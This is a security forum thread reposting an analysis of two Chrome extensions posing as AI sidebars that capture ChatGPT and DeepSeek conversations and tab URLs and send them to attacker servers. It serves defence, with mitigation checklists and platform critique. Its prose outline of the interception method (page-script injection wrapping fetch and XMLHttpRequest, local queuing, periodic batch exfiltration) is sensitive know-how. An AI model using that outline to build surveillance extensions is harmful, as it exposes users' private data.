Malicious Chrome Extensions Steal AI Chat Conversations and Browsing Context

  • Thread Author
A row of deceptively benign Chrome extensions—installed by hundreds of thousands of users—were audited and exposed this week as active surveillance tools that collect and exfiltrate entire conversations with AI assistants (notably ChatGPT and DeepSeek) along with full browsing context to attacker-controlled servers, with one variant still carrying Google’s “Featured” badge as researchers alerted platform owners.

Dark UI shows ChatGPT DeepSeek reading website content into a local database with 30-minute exfiltration.Background / Overview​

Browser extensions have long been a double-edged sword: they add productivity and convenience but run with powerful privileges inside the browser. That combination makes extensions attractive for legitimate developers and malicious actors alike. In a fresh case documented by OX Security, two Chrome extensions impersonating a legitimate AI-sidebar product were found to harvest user prompts and model outputs from ChatGPT and DeepSeek, persistently collect open-tab URLs and related metadata, and transmit that data to command‑and‑control (C2) infrastructure under attacker control. The tally of installs across both malicious listings exceeds roughly 900,000 at the time of disclosure. This incident sits on top of a string of recent discoveries showing how extension ecosystems have been weaponized: prior disclosures (most notably the Koi Security analyses and long-running “ShadyPanda” campaigns) documented millions of installs for extensions that later received malicious updates and began harvesting sensitive data across AI platforms and popular web apps. Those earlier reports illustrated the same systemic weaknesses—auto-updates, broad host permissions, and opaque runtime behavior—that enabled scale in the current case.

What OX Security found: the malicious sidebar clones​

Two extensions, one malicious pattern​

OX Security’s analysis identifies two Chrome Web Store listings that implement an AI sidebar interface but also embed exfiltration logic:
  • Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI — reported at roughly 600,000 installs and observed carrying the Chrome “Featured” badge.
  • AI Sidebar with Deepseek, ChatGPT, Claude and more — reported at roughly 300,000 installs.
Both extensions reproduce the expected AITOPIA sidebar user experience (a familiar UI that lets users chat with LLMs directly inside a page), which lowers suspicion and drives adoption. Underneath that veneer, researchers found code that reads all website content and specifically detects chat pages for ChatGPT and DeepSeek, captures prompts and assistant responses in real time, stores them locally, and batches them to remote C2 hosts every 30 minutes.

Exact behavior observed​

  • The extensions request broad host permissions (notably the ability to read all website content), then monitor open tabs for targeted AI domains. When a chat is detected, injected scripts extract both user prompts and the LLM responses.
  • Captured data is written to a local database (persistence on disk) to queue payloads for periodic exfiltration. The batch exfiltration occurs on an automated schedule (observed ~every 30 minutes) and targets C2 endpoints under attacker control.
  • The malicious flow asks for what is framed as permission to collect “anonymous, non-identifiable analytics” in order to appear legitimate; that prompt becomes the opt‑in vector for silent, high-fidelity collection.
  • The operators set up mis‑leading privacy pages and uninstall‑redirects using the Lovable site builder to frustrate traceback and to push users toward re-installing alternative malicious listings if one is removed. When one of the two malicious extensions is uninstalled, it attempts to open the other’s store page to trick users into reinstalling the alternate malicious variant.
These actions are not mere clickstream collection; they capture the substantive content of conversations that users explicitly type into AI chat interfaces—content that may include proprietary source code, business strategy, legal and medical questions, session tokens embedded in URL parameters, and other high-value secrets.

Why this matters: the sensitivity and weaponization risk​

The combination of data types exfiltrated here creates a force‑multiplier for attackers:
  • High-fidelity content — raw prompts and model outputs can contain everything from API keys and code snippets to confidential legal text and PII. That gives adversaries direct access to the sensitive material users deliberately shared with an AI.
  • Context & identifiers — timestamps, conversation IDs, and model/platform identifiers make the data actionable for re‑identification, chaining across sessions, and timing attacks.
  • Full tab URLs and URL parameters — these can leak session tokens, internal corporate URLs, and query strings that reveal research topics or internal tools. Stealing such tokens enables lateral movement and account takeover in some cases.
The downstream monetization or misuse scenarios are stark: harvested chats can be weaponized for corporate espionage, identity theft, targeted phishing (BEC), and sold on underground or commercial data markets where behavioral and conversational intelligence is prized. Independent reporting and prior investigations show such data channels have real commercial value and have motivated similar campaigns targeting AI chats and browsing sessions.

Technical anatomy — how the interception works​

Page-context capture vs network interception​

The critical technical point is the capture location: when an extension injects code into the page context and hooks or wraps browser APIs (like fetch or XMLHttpRequest), it operates where decrypted content is available to JavaScript running in the page. That means TLS does not protect the content from code already running inside the browser process. This model—inject, parse, package, and forward—is an effective method to harvest chat content in plaintext, regardless of transport-layer encryption, because the interception occurs where content is already accessible.

Typical flow observed in malicious sidebar clones​

  • Tab monitoring detects a target domain (ChatGPT or DeepSeek).
  • An executor content script or injected module runs in the page context and wraps native network APIs to capture prompts and responses.
  • Captured content is relayed via window.postMessage to the extension background worker and persisted locally in an extension-scoped database.
  • A background job compresses and transmits batches to remote C2/analytics endpoints on a periodic schedule. Observed schedule: every 30 minutes.

Evasion and persistence tactics​

  • Abuse of the extension auto‑update mechanism and default-on telemetry settings enables massive scale and stealth: millions of users can be opted into new runtime behavior without explicit re‑consent. This pattern featured prominently in earlier “sleeper” campaigns where extensions started benign and later switched behavior via an update.
  • Uninstall redirects and cross‑listing strategies aim to preserve presence: if a user removes one malicious variant, the extension opens the other listing to manipulate users into reinstalling. That behavior increases the chance of persistence across remediation attempts.

How well-supported are the findings? Strengths and open questions​

Evidence that is well-supported​

  • The technical mechanics (page-context executor scripts, API hooking, background exfiltration) are reproducible and described in multiple independent analyses. Those behaviors are visible in code artifacts, extension manifests, and network telemetry pointed to attacker-controlled analytics endpoints.
  • Install counts and store metadata (the “Featured” badge, public install totals) are observable from the Chrome Web Store at disclosure time and corroborated by multiple outlets. The reported combined install base for the two extensions is ~900,000 (600k + 300k).

Claims that require cautious qualification​

  • Assertions about who bought or consumed harvested chats—claims that data was sold to specific brokers or buyers—are plausible given the publisher’s disclosure language and historical patterns, but public forensic confirmation (transactional receipts or purchaser lists) has not been exhaustively documented. Treat downstream sale claims as credible leads that require further forensic evidence.
  • The total scope of exposure (how many active accounts and which specific corporate environments were affected) is estimated from store install counts and telemetry proxies; these figures are useful guidance for risk assessment but are not forensic counts of actively compromised hosts. Public install tallies include inactive installs and synced devices.

Timeline and disclosure (exact dates)​

  • OX Security publicly disclosed the campaign and published a technical write-up on December 30, 2025, reporting the two malicious extensions and the exfiltration behavior.
  • OX Security says it reported the two extensions to Google on December 29, 2025; Google acknowledged and told researchers it was reviewing the report the following day. As of the December 30 reporting window, the extensions remained available and one still bore the “Featured” badge while Google reviewed the case. Administrators should treat the presence of a Featured badge as not a guarantee that an extension is safe.

Immediate mitigation: a prioritized checklist for Windows users and IT teams​

These steps are practical, immediate, and prioritized to reduce exposure quickly.
For individual Windows users (urgent, do this now)
  • Open chrome://extensions (or edge://extensions) and search for both listings:
  • Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI (extension ID reported by researchers).
  • AI Sidebar with Deepseek, ChatGPT, Claude and more (extension ID reported by researchers).
  • Uninstall any of the implicated extensions from every profile and browser instance. Manual removal is the only guaranteed way to stop an already-installed extension.
  • Assume any secrets pasted into AI chats while these extensions were installed are compromised. Rotate passwords, revoke and reissue API keys, and reset tokens that may have been shared.
  • Enable multi-factor authentication (MFA) on important accounts if not already enabled and closely monitor financial and email accounts for suspicious activity.
For enterprise/IT teams (immediate and short-term)
  • Implement a default-deny extension posture: use Group Policy (Chrome Enterprise), Intune, or another MDM/EDM to allowlist only verified extensions and block all others.
  • Scan endpoints for the specific extension IDs and hashes published by OX Security and remove them at scale. Use EDR and browser management APIs to orchestrate removal.
  • Hunt in proxy and EDR telemetry for outbound connections to identified C2/analytics domains (researchers published IoCs) and block those domains at the network edge.
  • Rotate any enterprise secrets that may have been posted into AI chats by affected employees and work with legal/compliance to assess breach notification obligations.
Longer-term enterprise controls
  • Centralize browser extension policy (allowlist/blocklist) and expand telemetry to detect page-context injections or unusual extension background network flows. Treat extension governance as a first-class security control.

Platform and policy failures that enabled this incident​

This outbreak replays familiar systemic gaps in browser extension ecosystems:
  • Runtime behavior blind spot — static store reviews and manifest inspections cannot reliably detect code that activates only when specific domains load or that downloads additional payloads at runtime.
  • Auto-update abuse — automatic extension updates can silently switch benign extensions into surveillance tools without explicit re‑consent, turning an accumulated trust base into a mass distribution channel for malicious features.
  • Misplaced trust signals — store badges like “Featured” are often interpreted by users as safety guarantees. This incident shows badges alone are insufficient; runtime revalidation and transparent rationale for badges are needed.
Suggested platform fixes (practical and implementable)
  • Mandate dynamic runtime tests during extension review that simulate visits to common AI assistant domains and exercise domain-triggered behaviors in sandboxed environments.
  • Enforce forced re‑consent or manual review for updates that materially change data collection or add broad host permissions. Auto-updates should not be an unattended pathway for new surveillance features.
  • Expose more transparent metadata for trust badges: when was the last runtime revalidation performed, and what tests were run? Users deserve a clear explanation of what a badge actually means.

Critical analysis — strengths, limitations, and risks going forward​

Strengths of the disclosure​

  • The technical artifacts—extension IDs, version numbers, code structure, C2 domains and manifest entries—are concrete and reproducible, making the core technical claim robust. Multiple independent outlets and researcher communities reproduced the high-level mechanics, increasing confidence.

Limitations and what remains unproven​

  • The precise chain of custody for harvested conversations beyond the publisher’s analytics endpoints is not yet exhaustively demonstrated in public forensic records; while the publisher’s privacy policy and observed telemetry suggest downstream sharing, definitive public proof of sales/contracts is still outstanding. Investigators and regulators should prioritize confirming downstream buyers and full data flows.
  • Install counts derived from store metadata are useful signals but do not equate to exact numbers of actively compromised devices or corporate exposures; organizations must perform endpoint scanning for precise impact assessments.

Strategic risks going forward​

  • Copycats and scale: As AI chat becomes central to personal and professional workflows, adversaries have a clear incentive to replicate this model across other “popular” extension categories (free VPNs, productivity helpers, tab managers). Expect similar campaigns to follow until platform-level mitigations are enforced.
  • Data broker laundering: Even if the initial operator claims anonymization, the combination of textual content, timestamps, and session metadata can enable re‑identification and correlation with other datasets, reducing the protective value of “anonymized” claims.
  • Enterprise blind spots: Traditional EDR and network controls often do not see inside the browser page context; organizations must extend governance to browser-level policies and telemetry to close this blind spot.

Practical guidance for WindowsForum readers (quick reference)​

  • Uninstall suspicious extensions immediately; check both Chrome and Edge profiles.
  • Rotate any credentials or API keys you pasted into AI chats after July 9, 2025 (the pattern of earlier campaign updates shows that auto-updates were used to flip behavior in mid‑2025; treat any chats after that period as potentially affected unless you can verify otherwise). Use absolute dates when assessing exposure windows.
  • For organizations, deploy allowlists via enterprise policy and scan endpoints for the extension IDs and IoCs published by researchers.

Conclusion​

This disclosure is a sharp reminder that convenience can be weaponized: browser extensions—especially those that promise privacy or improved AI integration—can quietly become mass surveillance tools when platform controls and runtime review are inadequate. The OX Security findings (and corroborating reporting across multiple outlets) show a practical, high-impact exploitation pattern: impersonate a trusted sidebar UI, request plausible analytics consent, capture plaintext AI conversations and browsing context inside the page, and exfiltrate them periodically to attacker endpoints. For consumers and enterprise defenders the response is immediate and non-negotiable: audit installed extensions, remove suspicious items, treat any secrets shared in AI chats as compromised, and harden browser governance. For platform owners and vendors, the remedy is structural: runtime behavioral testing, stronger update governance, and clearer provenance for trust badges. Without these measures, the convenience of in‑browser AI will continue to expand the attack surface for mass data harvesting—turning the very tools designed to increase productivity into a vector for large-scale privacy and corporate-security failures.

(Disclosure note: the analysis above draws on the OX Security technical write-up and contemporaneous reporting by multiple outlets; technical artifacts and IoCs published by researchers inform the mitigation steps and recommended enterprise actions described.
Source: Security Boulevard Widely Used Malicious Extensions Steal ChatGPT, DeepSeek Conversations
 

Back
Top